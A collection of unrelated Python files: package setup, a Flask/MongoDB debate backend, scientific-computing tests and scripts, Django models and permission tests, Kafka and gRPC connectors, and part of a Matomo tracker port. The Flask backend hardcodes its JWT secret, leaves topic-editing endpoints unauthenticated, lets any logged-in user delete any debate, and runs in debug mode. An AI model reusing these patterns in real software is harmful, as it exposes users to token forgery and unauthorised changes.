re.compile(r""".*__version__ = ["']([^\n]*)['"]""", re.S)
.match(v_file.read())
.group(1)
)
with open(os.path.join(os.path.dirname(__file__), 'README.md')) as r_file:
readme = r_file.read()
setup(name='APIAlchemy',
version=VERSION,
description='API toolkit for Python, modeled after SQLAlchemy',
long_description=readme,
long_description_content_type='text/markdown',
license='MIT',
url='https://github.com/homedepot/apialchemy',
author='Mike Phillipson',
author_email='MICHAEL_PHILLIPSON1@homedepot.com',
packages=find_packages('src'),
package_dir={'': 'src'},
install_requires=[
'AppDynamicsRESTx',
'orionsdk',
'prometheus_client',
'prometheus-api-client',
'PyGithub',
'splunk-sdk'
],
zip_safe=False)
|
import datetime
import os
import json
import logging
from datetime import timedelta
from logging.config import fileConfig
from logging.handlers import RotatingFileHandler
from flask import Flask, Response, request
from flask_mongoengine import MongoEngine
from flask_cors import CORS
from flask_jwt_extended import JWTManager, jwt_required, create_access_token, create_refresh_token, get_jwt_identity
from flask_bcrypt import Bcrypt
from jsonschema import validate
from jsonschema.exceptions import ValidationError
from jsonschema.exceptions import SchemaError
# Log settings
fileConfig('./log_config.ini')
logger = logging.getLogger('debate_backend_logger')
handler = RotatingFileHandler(
'logs/debate_backend_logger.log', maxBytes=10000, backupCount=10)
handler.setLevel(logging.INFO)
app = Flask(__name__)
CORS(app)
app.config['MONGODB_SETTINGS'] = {
'host': os.environ['MONGODB_HOST'],
'username': os.environ['MONGODB_USERNAME'],
'password': os.environ['MONGODB_PASSWORD'],
'db': 'debate_web'
}
app.config['JWT_SECRET_KEY'] = 'sampleSecretKey'
app.config['JWT_ACCESS_TOKEN_EXPIRES'] = timedelta(hours=24)
app.config['JWT_REFRESH_LIFESPAN'] = {'days': 30}
app.logger.addHandler(handler)
db = MongoEngine()
db.init_app(app)
flask_bcrypt = Bcrypt(app)
jwt = JWTManager(app)
class UserInfo(db.Document):
id = db.SequenceField(primary_key=True)
email = db.StringField(unique=True)
password = db.StringField()
name = db.StringField()
role = db.StringField(default="Participant")
del_flg = db.StringField(default="0")
class Topics(db.Document):
id = db.SequenceField(primary_key=True)
title = db.StringField()
header = db.StringField()
content = db.StringField()
class DebateDetails(db.Document):
id = db.SequenceField(primary_key=True)
topic_num = db.IntField()
writer = db.IntField()
content = db.StringField()
create_on = db.DateTimeField(default=datetime.datetime.utcnow)
update_on = db.DateTimeField(default=datetime.datetime.utcnow)
class LikeOnDebate(db.Document):
id = db.SequenceField(primary_key=True)
debate_num = db.IntField()
user_id = db.IntField()
class UnLikeOnDebate(db.Document):
id = db.SequenceField(primary_key=True)
debate_num = db.IntField()
user_id = db.IntField()
def validate_for_auth(auth_data):
user_schema = {
"type": "object",
"properties": {
"name": {
"type": "string",
},
"email": {
"type": "string",
"format": "email"
},
"password": {
"type": "string",
"minLength": 8
}
},
"required": ["email", "password"],
"additionalProperties": False
}
try:
validate(auth_data, user_schema)
except ValidationError as e:
return {'result': False, 'message': e}
except SchemaError as e:
return {'result': False, 'message': e}
return {'result': True, 'data': auth_data}
@app.route('/api/auth', methods=['POST'])
def auth_login():
validated_data = validate_for_auth(request.json)
try:
if validated_data['result']:
request_data = validated_data['data']
request_pwd = request_data['password']
manager = UserInfo.objects(email=request_data['email']).first()
if manager and flask_bcrypt.check_password_hash(
manager['password'], request_pwd):
identify = {
'email': manager['email'],
'name': manager['name'],
'role': manager['role']
}
response = {
'status': 'SUCCESS',
'access_token': create_access_token(identity=identify),
'refresh_token': create_refresh_token(identity=identify)
}
return Response(json.dumps(response), mimetype="application/json", status=200)
else:
return Response(json.dumps({"result": False}), mimetype="application/json", status=200)
else:
return Response(json.dumps({"result": False}), mimetype="application/json", status=200)
except Exception as e:
return Response(json.dumps({"result": False}), mimetype="application/json", status=200)
@app.route('/api/refresh', methods=['POST'])
@jwt_required(refresh=True)
def refresh():
try:
current_user = get_jwt_identity()
print('USER', current_user)
response = {
'status': 'SUCCESS',
'access_token': create_access_token(identity=current_user)
}
except Exception as e:
print(e)
return Response(json.dumps(response), mimetype="application/json", status=200)
@app.route('/api/signup', methods=['POST'])
def register_manager():
request_data = request.json
response = {
'status': 'SUCCESS'
}
if UserInfo.objects(email=request_data['email']):
response['status'] = False
response['message'] = "{} is already registered...".format(
request_data['email'])
return Response(json.dumps(response), mimetype="application/json", status=200)
UserInfo(
name=request_data['name'],
email=request_data['email'],
password=flask_bcrypt.generate_password_hash(
request_data['password']).decode('utf-8')
).save()
return Response(json.dumps(response), mimetype="application/json", status=201)
@app.route("/api/topic", methods=['GET'])
def topics_list():
topics_list = Topics.objects().to_json()
return Response(topics_list, mimetype="application/json", status=200)
@app.route("/api/topic/<int:topic_num>", methods=['GET'])
def topic_one(topic_num):
topic_one = Topics.objects(id=topic_num).first().to_json()
return Response(topic_one, mimetype="application/json", status=200)
@app.route("/api/topic", methods=['POST'])
def add_topic():
task = request.json
created_topic = Topics(
title=task['title'],
header=task['header'],
content=task['content']
).save()
print(created_topic)
return Response(created_topic.to_json(), mimetype="application/json", status=201)
@app.route("/api/topic", methods=['PUT'])
def modify_topic():
task = request.json
modified_topic = Topics(
id=task['_id'],
title=task['title'],
header=task['header'],
content=task['content']
).save()
print(modified_topic)
return Response("SUCCESS", mimetype="application/json", status=200)
@app.route("/api/topic/<int:topic_id>", methods=['DELETE'])
@jwt_required()
def delete_topic(topic_id):
current_user = get_jwt_identity()
if current_user['role'] != "Manager":
return Response("No permission", mimetype="application/json", status=200)
Topics.objects(id=topic_id).delete()
target_debate = DebateDetails.objects(topic_num=topic_id)
for element in target_debate:
LikeOnDebate.objects(debate_num=element['id']).delete()
UnLikeOnDebate.objects(debate_num=element['id']).delete()
element.delete()
return Response("SUCCESS", mimetype="application/json", status=200)
@app.route("/api/debates/<int:refer_num>", methods=['GET'])
def debate_list(refer_num):
get_data = DebateDetails.objects(topic_num=refer_num)
debate_list = []
for debate in get_data:
debate_dict = debate.to_mongo().to_dict()
user_info = UserInfo.objects(id=debate_dict['writer']).first()
debate_dict['username'] = user_info['name']
debate_dict['create_on'] = datetime.datetime.strftime(
debate.create_on, '%Y-%m-%d %H:%M:%S')
debate_dict['update_on'] = datetime.datetime.strftime(
debate.update_on, '%Y-%m-%d %H:%M:%S')
debate_list.append(debate_dict)
return Response(json.dumps(debate_list), mimetype="application/json", status=200)
@app.route("/api/debates", methods=['POST'])
@jwt_required()
def register_debate():
task = request.json
current_user = get_jwt_identity()
user = UserInfo.objects(email=current_user['email']).first()
created_detail = DebateDetails(
topic_num=task['topicNum'],
writer=user['id'],
content=task['content']
).save()
return Response("SUCCESS", mimetype="application/json", status=201)
@app.route("/api/debates/<int:debate_id>", methods=['DELETE'])
@jwt_required()
def delete_debate(debate_id):
target_debate = DebateDetails.objects(id=debate_id).first()
LikeOnDebate.objects(debate_num=target_debate['id']).delete()
UnLikeOnDebate.objects(debate_num=target_debate['id']).delete()
target_debate.delete()
return Response("SUCCESS", mimetype="application/json", status=200)
@app.route("/api/debates", methods=['PUT'])
@jwt_required()
def put_debate():
task = request.json
current_user = get_jwt_identity()
user = UserInfo.objects(email=current_user['email']).first()
DebateDetails(
id=task['_id'],
topic_num=task['topicNum'],
writer=user['id'],
content=task['content']
).save()
return Response("SUCCESS", mimetype="application/json", status=200)
@app.route("/api/like/<int:debate_num>", methods=['GET'])
@jwt_required()
def get_debate_like(debate_num):
current_user = get_jwt_identity()
user = UserInfo.objects(email=current_user['email']).first()
response = {
'like_cnt': LikeOnDebate.objects(debate_num=debate_num).count(),
'unlike_cnt': UnLikeOnDebate.objects(debate_num=debate_num).count(),
'liked': False if LikeOnDebate.objects(debate_num=debate_num, user_id=user['id']).count() == 0 else True,
'unliked': False if UnLikeOnDebate.objects(debate_num=debate_num, user_id=user['id']).count() == 0 else True
}
return Response(json.dumps(response), mimetype="application/json", status=200)
@app.route("/api/like", methods=['POST'])
@jwt_required()
def post_debate_like():
task = request.json
current_user = get_jwt_identity()
user = UserInfo.objects(email=current_user['email']).first()
if LikeOnDebate.objects(debate_num=task['debate_id'], user_id=user['id']).count() == 0:
LikeOnDebate(debate_num=task['debate_id'], user_id=user['id']).save()
if UnLikeOnDebate.objects(debate_num=task['debate_id'], user_id=user['id']).count() > 0:
UnLikeOnDebate.objects(
debate_num=task['debate_id'], user_id=user['id']).delete()
else:
LikeOnDebate.objects(
debate_num=task['debate_id'], user_id=user['id']).delete()
return Response("SUCCESS", mimetype="application/json", status=200)
@app.route("/api/unlike", methods=['POST'])
@jwt_required()
def post_debate_unlike():
task = request.json
current_user = get_jwt_identity()
user = UserInfo.objects(email=current_user['email']).first()
if UnLikeOnDebate.objects(debate_num=task['debate_id'], user_id=user['id']).count() == 0:
UnLikeOnDebate(
debate_num=task['debate_id'], user_id=user['id']).save()
if LikeOnDebate.objects(debate_num=task['debate_id'], user_id=user['id']).count() > 0:
LikeOnDebate.objects(
debate_num=task['debate_id'], user_id=user['id']).delete()
else:
UnLikeOnDebate.objects(debate_num=task['debate_id'],
user_id=user['id']).delete()
return Response("SUCCESS", mimetype="application/json", status=200)
if __name__ == "__main__":
app.run(debug=True, port=5500)
|
import nipype.pipeline as pe
from nipype.interfaces.utility import Function
# ToDo: not use a mutable argument for sg_args
def _check_if_iterable(to_iter, arg):
if not isinstance(arg, list):
arg = [arg] * len(to_iter)
return arg
fix_iterable = pe.Node(Function(input_names=['to_iter', 'arg'], output_names='arg_fixed',
function=_check_if_iterable), name='fix_iterable')
|
# Copyright 2019-2021 ETH Zurich and the DaCe authors. All rights reserved.
""" Tests constant folding with globals. """
import dace
import numpy as np
from dace.frontend.python import astutils
from dace.frontend.python.newast import (GlobalResolver,
ConditionalCodeResolver,
DeadCodeEliminator)
from dace.frontend.python.parser import DaceProgram
class MyConfiguration:
def __init__(self, parameter):
self.p = parameter * 2
@property
def q(self):
return self.p * 2
def get_parameter(self):
return self.p // 2
@staticmethod
def get_random_number():
return 4
@property
def cloned(self):
return MyConfiguration(self.get_parameter())
N = 2
cfg = MyConfiguration(N)
val = 5
# Confuse AST parser with global of the same name as array
A = 5
@dace.program
def instantiated_global(A):
A[cfg.q] = (A[cfg.get_parameter()] * MyConfiguration.get_random_number() +
cfg.p) + val
def test_instantiated_global():
"""
Tests constant/symbolic values with predetermined global values.
"""
A = np.random.rand(10)
reg_A = np.copy(A)
reg_A[cfg.q] = (reg_A[cfg.get_parameter()] *
MyConfiguration.get_random_number() + cfg.p) + val
instantiated_global(A)
assert np.allclose(A, reg_A)
def test_nested_globals():
"""
Tests constant/symbolic values with multiple nesting levels.
"""
@dace.program
def instantiated_global2(A):
A[cfg.q] = cfg.cloned.p
A = np.random.rand(10)
reg_A = np.copy(A)
reg_A[cfg.q] = cfg.cloned.p
instantiated_global2(A)
assert np.allclose(A, reg_A)
def _analyze_and_unparse_code(func: DaceProgram) -> str:
src_ast, _, _, _ = astutils.function_to_ast(func.f)
resolved = {
k: v
for k, v in func.global_vars.items() if k not in func.argnames
}
src_ast = GlobalResolver(resolved).visit(src_ast)
src_ast = ConditionalCodeResolver(resolved).visit(src_ast)
src_ast = DeadCodeEliminator().visit(src_ast)
return astutils.unparse(src_ast)
def test_dead_code_elimination_if():
"""
Tests dead code elimination with compile-time if conditions.
"""
sym = dace.symbol('sym', positive=True)
cfg_symbolic = MyConfiguration(sym)
@dace.program
def test(A):
if cfg_symbolic.q > sym:
return 2 * A
else:
return 4 * A
parsed_code = _analyze_and_unparse_code(test)
assert '4' not in parsed_code
assert '2' in parsed_code
def test_dead_code_elimination_ifexp():
"""
Tests dead code elimination with compile-time ternary expressions.
"""
sym = dace.symbol('sym', positive=True)
cfg_symbolic = MyConfiguration(sym)
@dace.program
def test(A):
return 2 * A if cfg_symbolic.q > sym else 4 * A
parsed_code = _analyze_and_unparse_code(test)
assert '4' not in parsed_code
assert '2' in parsed_code
def test_dead_code_elimination_noelse():
"""
Tests dead code elimination with compile-time if conditions (without else).
"""
scale = None
@dace.program
def test(A):
if scale is None:
return 2 * A
return scale * A
parsed_code = _analyze_and_unparse_code(test)
assert 'scale' not in parsed_code
assert '2' in parsed_code
def test_dead_code_elimination_unreachable():
"""
Tests dead code elimination with unreachable code.
"""
@dace.program
def test(A):
if A[5] > 1:
return 3 * A
return 6 * A
return 2 * A
return 4 * A
parsed_code = _analyze_and_unparse_code(test)
assert '6' not in parsed_code and '4' not in parsed_code # Dead code
assert '5' in parsed_code and '1' in parsed_code # Condition
assert '3' in parsed_code and '2' in parsed_code # Reachable code
# TODO: dace.constant should signal that argument evaluation is deferred to
# (nested) call time
# dace.constant = lambda x: None
# def test_constant_parameter():
# """
# Tests nested functions with constant parameters passed in as arguments.
# """
# @dace.program
# def nested_func(cfg: dace.constant(MyConfiguration), A: dace.float64[20]):
# return A[cfg.p]
# @dace.program
# def constant_parameter(
# cfg: dace.constant(MyConfiguration),
# cfg2: dace.constant(MyConfiguration), A: dace.float64[20]):
# A[cfg.q] = nested_func(cfg, A)
# A[MyConfiguration.get_random_number()] = nested_func(cfg2, A)
# cfg1 = MyConfiguration(3)
# cfg2 = MyConfiguration(4)
# A = np.random.rand(20)
# reg_A = np.copy(A)
# reg_A[12] = reg_A[6]
# reg_A[4] = reg_A[8]
# constant_parameter(cfg1, cfg2, A)
# assert np.allclose(A, reg_A)
if __name__ == '__main__':
test_instantiated_global()
test_nested_globals()
test_dead_code_elimination_if()
test_dead_code_elimination_ifexp()
test_dead_code_elimination_noelse()
test_dead_code_elimination_unreachable()
# test_constant_parameter()
|
from django.db import models
class Contato(models.Model):
nome = models.CharField(max_length=50)
endereco = models.CharField(max_length=200)
email = models.EmailField(max_length=100)
data_nascimento = models.DateField()
telefone = models.CharField(max_length=20)
def __str__(self):
return self.nome
class Livros(models.Model):
titulo = models.CharField(max_length=50)
autor = models.CharField(max_length=200)
assunto = models.CharField(max_length=100)
editora = models.CharField(max_length=20)
isbn = models.CharField(max_length=20)
ano = models.DateField()
def __str__(self):
return self.titulo
# Create your models here.
|
#!/usr/bin/env python3
import csv
import gzip
import sys
import utils
# Trawls through the RU-IRA dataset and counts basic statistics within a
# specified time window.
if __name__=='__main__':
fn = sys.argv[1]
start_ts = utils.extract_ts_s(sys.argv[2], fmt=utils.DCW_TS_FORMAT)
end_ts = utils.extract_ts_s(sys.argv[3], fmt=utils.DCW_TS_FORMAT)
try:
if fn[-1] in 'zZ':
in_f = gzip.open(fn, 'rt', encoding='utf-8')
else:
in_f = open(fn, 'r', encoding='utf-8')
csv_reader = csv.DictReader(in_f)
users = set()
tweets = 0
rts = 0
row_count = 0
for row in csv_reader:
row_count = utils.log_row_count(row_count, True)
ts = utils.extract_ts_s(row['tweet_time'], fmt=utils.IRA_TS_FORMAT)
if ts < start_ts or ts > end_ts: continue # may not be in timestamp order
tweets += 1
users.add(row['userid'])
if row['is_retweet'].lower() == 'true': rts += 1
print('\nTweets: %10d' % tweets)
print('Retweets: %10d' % rts)
print('Accounts: %10d' % len(users))
finally:
in_f.close()
|
import numpy as np
import matplotlib.pyplot as plt
import sys, os
sys.path.append("../../../toolbox")
from toolbox import plot as ph
import helpers
from pathlib import Path
sys.path.append("../../../gempy")
from gempy.assets import topology as tp
import scipy.stats
data_folder = Path("D:/datasets/paper_topology/03_gullfaks/")
simulation = Path("smc_jac_paper")
priors = helpers.load_priors(data_folder / simulation / "priors.json")
thresholds = [t for t in os.listdir(data_folder / simulation)
if os.path.isdir(data_folder / simulation / t)]
samples = {}
skip = ["vertices", "simplices", "centroids", "lb"] + list(priors.keys())
for t in thresholds:
samples[t] = helpers.load_samples(
data_folder / simulation / t,
skip=skip
)
nrows = len(samples.keys())
fig, axes = plt.subplots(
nrows=nrows,
figsize=ph.get_figsize(1, ratio=0.5)
)
for ax, (threshold, sample) in zip(axes, samples.items()):
print(f"threshold: {threshold}")
ax.set_title(str(threshold))
edges = sample.get("edges")
print(len(edges))
if not edges:
continue
u, c, idx = tp.count_unique_topologies(edges)
print(f"# unique topologies: {len(u)}")
# ax.bar(range(len(c)), c.sort())
plt.show()
|
from django.test import TestCase, Client
from django.urls import reverse
from guardian.shortcuts import assign_perm
from guardian.utils import get_anonymous_user
from rnapuzzles.models import CustomUser, Group as CustomGroup
class GroupView(TestCase):
def setUp(self):
self.user_without = CustomUser.objects.create(email="a@a.pl")
self.user_with = CustomUser.objects.create(email="b@a.pl")
self.user_object = CustomUser.objects.create(email="c@a.pl")
self.group = CustomGroup.objects.create(group_name="Test")
assign_perm("rnapuzzles.delete_group", self.user_with)
assign_perm("rnapuzzles.add_group", self.user_with)
assign_perm("rnapuzzles.change_group", self.user_object, self.group)
assign_perm("rnapuzzles.delete_group", self.user_object, self.group)
self.client = Client()
def test_list_with(self):
self.client.force_login(self.user_with)
response = self.client.get(reverse("groups_list"))
self.assertEqual(response.status_code, 200)
self.assertTrue(len(response.context["object_list"]) == 1)
def test_list_object(self):
self.client.force_login(self.user_object)
response = self.client.get(reverse("groups_list"))
print(response)
self.assertEqual(response.status_code, 200)
self.assertTrue(len(response.context["object_list"]) == 1)
def test_list_without(self):
self.client.force_login(self.user_without)
response = self.client.get(reverse("groups_list"))
self.assertEqual(response.status_code, 200)
self.assertTrue(len(response.context["object_list"]) == 0)
def test_view_with(self):
self.client.force_login(self.user_with)
response = self.client.get(reverse("group_detail", args=[self.group.pk]))
self.assertEqual(response.status_code, 200)
def test_view_without(self):
self.client.force_login(self.user_without)
response = self.client.get(reverse("group_detail", args=[self.group.pk]))
self.assertEqual(response.status_code, 403)
def test_view_object(self):
self.client.force_login(self.user_object)
response = self.client.get(reverse("group_detail", args=[self.group.pk]))
self.assertEqual(response.status_code, 200)
def test_update_with(self):
self.client.force_login(self.user_with)
response = self.client.get(reverse("group_update", args=[self.group.pk]))
self.assertEqual(response.status_code, 302)
def test_update_without(self):
self.client.force_login(self.user_without)
response = self.client.get(reverse("group_update", args=[self.group.pk]))
self.assertEqual(response.status_code, 302)
def test_update_object(self):
self.client.force_login(self.user_object)
response = self.client.get(reverse("group_update", args=[self.group.pk]))
self.assertEqual(response.status_code, 200)
|
#!/usr/bin/env python
# A simple recurrent neural network that learns a simple sequential data set.
__author__ = 'Tom Schaul, tom@idsia.ch and Daan Wierstra'
from datasets import AnBnCnDataSet #@UnresolvedImport
from pybrain.supervised import BackpropTrainer
from pybrain.structure import FullConnection, RecurrentNetwork, TanhLayer, LinearLayer, BiasUnit
def testTraining():
# the AnBnCn dataset (sequential)
d = AnBnCnDataSet()
# build a recurrent network to be trained
hsize = 2
n = RecurrentNetwork()
n.addModule(TanhLayer(hsize, name = 'h'))
n.addModule(BiasUnit(name = 'bias'))
n.addOutputModule(LinearLayer(1, name = 'out'))
n.addConnection(FullConnection(n['bias'], n['h']))
n.addConnection(FullConnection(n['h'], n['out']))
n.addRecurrentConnection(FullConnection(n['h'], n['h']))
n.sortModules()
# initialize the backprop trainer and train
t = BackpropTrainer(n, learningrate = 0.1, momentum = 0.0, verbose = True)
t.trainOnDataset(d, 200)
# the resulting weights are in the network:
print 'Final weights:', n.params
if __name__ == '__main__':
testTraining()
|
from django.utils import timezone
from django.db import models
class BaseModel(models.Model):
c_at = models.DateTimeField(default=timezone.now)
u_at = models.DateTimeField(auto_now=True)
class Meta:
abstract = True
|
'''Bradley adaptive thresholding. Credit goes to http://stackoverflow.com/a/33092928/4414003
where user @rayryeng wrote an implementation much more efficient than mine. To see my original code,
visit that link.'''
import numpy as np
from PIL import Image
import time
def bradley_threshold(image, s=None, t=None):
# Convert image to numpy array
img = np.array(image).astype(np.float)
# Default window size is round(cols/8)
if s is None:
s = np.round(img.shape[1]/8)
# Default threshold is 15% of the total
# area in the window
if t is None:
t = 15.0
# Compute integral image
intImage = np.cumsum(np.cumsum(img, axis=1), axis=0)
# Define grid of points
rows,cols = img.shape[:2]
X,Y = np.meshgrid(np.arange(cols), np.arange(rows))
# Make into 1D grid of coordinates for easier access
X = X.ravel()
Y = Y.ravel()
# Ensure s is even so that we are able to index into the image
# properly
s = s + np.mod(s,2)
# Access the four corners of each neighbourhood
x1 = X - s/2
x2 = X + s/2
y1 = Y - s/2
y2 = Y + s/2
# Ensure no coordinates are out of bounds
x1[x1 < 0] = 0
x2[x2 >= cols] = cols-1
y1[y1 < 0] = 0
y2[y2 >= rows] = rows-1
# Count how many pixels are in each neighbourhood
count = (x2 - x1) * (y2 - y1)
# Compute the row and column coordinates to access
# each corner of the neighbourhood for the integral image
f1_x = x2
f1_y = y2
f2_x = x2
f2_y = y1 - 1
f2_y[f2_y < 0] = 0
f3_x = x1-1
f3_x[f3_x < 0] = 0
f3_y = y2
f4_x = f3_x
f4_y = f2_y
# Compute areas of each window
sums = intImage[f1_y, f1_x] - intImage[f2_y, f2_x] - intImage[f3_y, f3_x] + intImage[f4_y, f4_x]
# Compute thresholded image and reshape into a 2D grid
out = np.ones(rows*cols, dtype=np.bool)
out[img.ravel()*count <= sums*(100.0 - t)/100.0] = False
# Also convert back to uint8
out = 255*np.reshape(out, (rows, cols)).astype(np.uint8)
# Return PIL image back to user
return Image.fromarray(out)
if __name__ == '__main__':
p=Image.open('../Test Images/test.jpg').convert('L')
print p.size
a=time.time()
bradley_threshold(p).show()
print time.time()-a
|
import os
from functools import partial
from pydantic import validator, AnyHttpUrl, Field
from wunderkafka.time import now
from wunderkafka import SRConfig, ConsumerConfig, SecurityProtocol, AvroConsumer
# If you are the fan of 12 factors, you may want to config via env variables
class OverridenSRConfig(SRConfig):
url: AnyHttpUrl = Field(env='SCHEMA_REGISTRY_URL')
@validator('sasl_username')
def from_env(cls, v) -> str:
# And to use 'native' kerberos envs
return '{0}@{1}'.format(os.environ.get('KRB5_USER'), os.environ.get('KRB5_REALM'))
# Or you want to override some defaults by default (pun intended)
class OverridenConfig(ConsumerConfig):
# Consumer which do not commit messages automatically
enable_auto_commit: bool = False
# And knows nothing after restart due to new gid.
group_id: str = 'wunderkafka-{0}'.format(now())
# More 12 factors
bootstrap_servers: str = Field(env='BOOTSTRAP_SERVER')
security_protocol: SecurityProtocol = SecurityProtocol.sasl_ssl
sasl_kerberos_kinit_cmd: str = ''
sr: SRConfig = OverridenSRConfig()
@validator('sasl_kerberos_kinit_cmd')
def format_keytab(cls, v) -> str:
if not v:
return 'kinit {0}@{1} -k -t {0}.keytab'.format(os.environ.get('KRB5_USER'), os.environ.get('KRB5_REALM'))
# Still allowing to set it manually
return str(v)
# After this you can partial your own Producer/Consumer, something like...
MyConsumer = partial(AvroConsumer, config=OverridenConfig())
|
from .model_connector import ModelConnector
class GRPCConnector(ModelConnector):
@staticmethod
def check_import():
import grpc
import tensorflow as tf
import tensorflow_serving
def __init__(self, arg, name=''):
super().__init__(arg)
# warmup
import grpc
# noinspection PyUnresolvedReferences
import tensorflow as tf # tf serving needs tf ... which is a HUGE dependency
# noinspection PyUnresolvedReferences
import tensorflow_serving.apis
from tensorflow_serving.apis import prediction_service_pb2_grpc
assert name != '', "Name must be specified"
self.timeout = 60.0
maximum_message_length = 100 * 1024 * 1024
options = [
('grpc.max_message_length', maximum_message_length),
('grpc.max_receive_message_length', maximum_message_length),
]
# TODO: support for secure channels?
self.channel = grpc.insecure_channel(arg, options=options)
self.stub = prediction_service_pb2_grpc.PredictionServiceStub(self.channel)
self.name = name
def get_signatures(self):
from tensorflow_serving.apis import get_model_metadata_pb2
mm = get_model_metadata_pb2.GetModelMetadataRequest()
mm.model_spec.name = self.name
mm.metadata_field.append('signature_def')
result = self.stub.GetModelMetadata(mm, self.timeout)
type_url = result.metadata['signature_def'].type_url
value = result.metadata['signature_def'].value
assert type_url == 'type.googleapis.com/tensorflow.serving.SignatureDefMap'
signatures_map = get_model_metadata_pb2.SignatureDefMap()
signatures_map.ParseFromString(value)
signatures = list(
sorted(
name
for name, signature_def in signatures_map.signature_def.items()
if name != '__saved_model_init_op'
)
)
return signatures
def call(self, signature, data):
import tensorflow as tf
from tensorflow_serving.apis import predict_pb2
request = predict_pb2.PredictRequest()
request.model_spec.name = self.name
request.model_spec.signature_name = signature
request.inputs['image'].CopyFrom(tf.make_tensor_proto(data))
result = self.stub.Predict(request, self.timeout)
tensor_proto = result.outputs['output_0']
# TODO: make work for non-float32 types
return tf.io.parse_tensor(tensor_proto.SerializeToString(), tf.float32).numpy()
|
from datetime import datetime
import hashlib
import json
import random
import re
import time
from urllib.parse import quote, parse_qs, urlencode
import uuid
def urlencode_plus(s):
if type(s) == str:
return quote(s)
elif type(s) == dict:
return urlencode(s)
else:
raise TypeError("urlencode_plus works only on strings and dicts.", s)
#
# This module is hand-corrected version of an automated translation of PHP MatomoTracker
#
is_int = lambda x: isinstance(x, int)
is_list = lambda x: isinstance(x, list)
is_numeric = lambda x: isinstance(x, float) # Used only once with float parameter
strpos = lambda s, sub: s.find(sub) if s.find(sub) != -1 else False
def strspn(str1, str2, start=0, length=None):
if not length:
length = len(str1)
return len(re.search("^[" + str2 + "]*", str1[start : start + length]).group(0))
"""
* Matomo - free/libre analytics platform
* For more information, see README.md
* @license released under BSD License http://www.opensource.org/licenses/bsd-license.php
* @link https://matomo.org/docs/tracking-api/
* @category Matomo
* @package MatomoTracker
"""
class MatomoTracker:
"""
MatomoTracker implements the Matomo Tracking Web API.
For more information, see: https://github.com/matomo-org/matomo-php-tracker/
* @package MatomoTracker
* @api
"""
"""
Matomo base URL, for example http://example.org/matomo/
Must be set before using the class by calling
MatomoTracker.URL = 'http://yourwebsite.org/matomo/'
* @var string
"""
URL = ""
"""
API Version
* @ignore
* @var int
"""
VERSION = 1
"""
* @ignore
"""
DEBUG_APPEND_URL = ""
"""
Visitor ID length
* @ignore
"""
LENGTH_VISITOR_ID = 16
"""
Charset
* @see set_page_charset
* @ignore
"""
DEFAULT_CHARSET_PARAMETER_VALUES = "utf-8"
"""
See matomo.js
"""
FIRST_PARTY_COOKIES_PREFIX = "_pk_"
"""
Defines how many categories can be used max when calling add_ecommerce_item().
* @var int
"""
MAX_NUM_ECOMMERCE_ITEM_CATEGORIES = 5
DEFAULT_COOKIE_PATH = "/"
def __init__(self, request, id_site, api_url=""):
"""
Builds a MatomoTracker object, used to track visits, pages and Goal conversions
for a specific website, by using the Matomo Tracking API.
* @param int id_site Id site to be tracked
* @param string api_url "http://example.org/matomo/" or "http://matomo.example.org/"
If set, will overwrite MatomoTracker.URL
"""
self.request = request
self.request_method = "GET"
self.ecommerceItems = []
self.attributionInfo = []
self.eventCustomVar = {}
self.forcedDatetime = ""
self.forcedNewVisit = False
self.networkTime = 0
self.serverTime = 0
self.transferTime = 0
self.domProcessingTime = 0
self.domCompletionTime = 0
self.onLoadTime = 0
self.pageCustomVar = {}
self.ecommerceView = {}
self.customParameters = {}
self.customDimensions = {}
self.customData = ""
self.hasCookies = False
self.token_auth = ""
self.user_agent = ""
self.country = ""
self.region = ""
self.city = ""
self.lat = 0.0
self.long = 0.0
self.width = 0
self.height = 0
self.plugins = ""
self.local_hour = ""
self.local_minute = ""
self.local_second = ""
self.idPageview = ""
self.id_site = str(id_site)
self.urlReferrer = self.request.get("HTTP_REFERER", "")
self.pageCharset = self.DEFAULT_CHARSET_PARAMETER_VALUES
self.pageUrl = self.get_current_url()
self.ip = self.request.get("REMOTE_ADDR", "")
self.accept_language = self.request.get("HTTP_ACCEPT_LANGUAGE", "")
self.user_agent = self.request.get("HTTP_USER_AGENT", "")
if api_url:
self.URL = api_url
# Life of the visitor cookie (in sec)
self.configVisitorCookieTimeout = 33955200
# 13 months (365 + 28 days)
# Life of the session cookie (in sec)
self.configSessionCookieTimeout = 1800
# 30 minutes
# Life of the session cookie (in sec)
self.configReferralCookieTimeout = 15768000
# 6 months
# Visitor Ids in order
self.user_id = ""
self.forcedVisitorId = ""
self.cookieVisitorId = ""
self.randomVisitorId = ""
self.set_new_visitor_id()
self.configCookiesDisabled = False
self.configCookiePath = self.DEFAULT_COOKIE_PATH
self.configCookieDomain = ""
self.configCookieSameSite = ""
self.configCookieSecure = False
self.configCookieHTTPOnly = False
self.currentTs = time.time()
self.createTs = self.currentTs
# Allow debug while blocking the request
self.requestTimeout = 600
self.doBulkRequests = False
self.storedTrackingActions = {}
self.sendImageResponse = True
self.visitorCustomVar = self.get_custom_variables_from_cookie()
self.outgoingTrackerCookies = {}
self.incomingTrackerCookies = {}
self.headersSent = False
self.proxy = ""
self.proxy_port = ""
def set_page_charset(self, charset=""):
"""
By default, Matomo expects utf-8 encoded values, for example
for the page URL parameter values, Page Title, etc.
It is recommended to only send UTF-8 data to Matomo.
If required though, you can also specify another charset using this function.
* @param string charset
* @return self
"""
self.pageCharset = charset
return self
def set_url(self, url):
"""
Sets the current URL being tracked
* @param string url Raw URL (not URL encoded)
* @return self
"""
self.pageUrl = url
return self
def set_url_referrer(self, url):
"""
Sets the URL referrer used to track Referrers details for new visits.
* @param string url Raw URL (not URL encoded)
* @return self
"""
self.urlReferrer = url
return self
def set_generation_time(self, time_ms):
"""
This method is deprecated and does nothing. It used to set the time that it took to generate the document on the server side.
* @param int time_ms Generation time in ms
* @return self
* @deprecated this metric is deprecated please use performance timings instead
* @see setPerformanceTimings
"""
return self
def set_performance_timings(self, network=0, server=0, transfer=0, domProcessing=0, domCompletion=0, onLoad=0):
"""
Sets timings for various browser performance metrics.
* @see https://developer.mozilla.org/en-US/docs/Web/API/PerformanceTiming
* @param int network Network time in ms (connectEnd – fetchStart)
* @param int server Server time in ms (responseStart – requestStart)
* @param int transfer Transfer time in ms (responseEnd – responseStart)
* @param int domProcessing DOM Processing to Interactive time in ms (domInteractive – domLoading)
* @param int domCompletion DOM Interactive to Complete time in ms (domComplete – domInteractive)
* @param int onload Onload time in ms (loadEventEnd – loadEventStart)
* @return $this
"""
self.networkTime = network
self.serverTime = server
self.transferTime = transfer
self.domProcessingTime = domProcessing
self.domCompletionTime = domCompletion
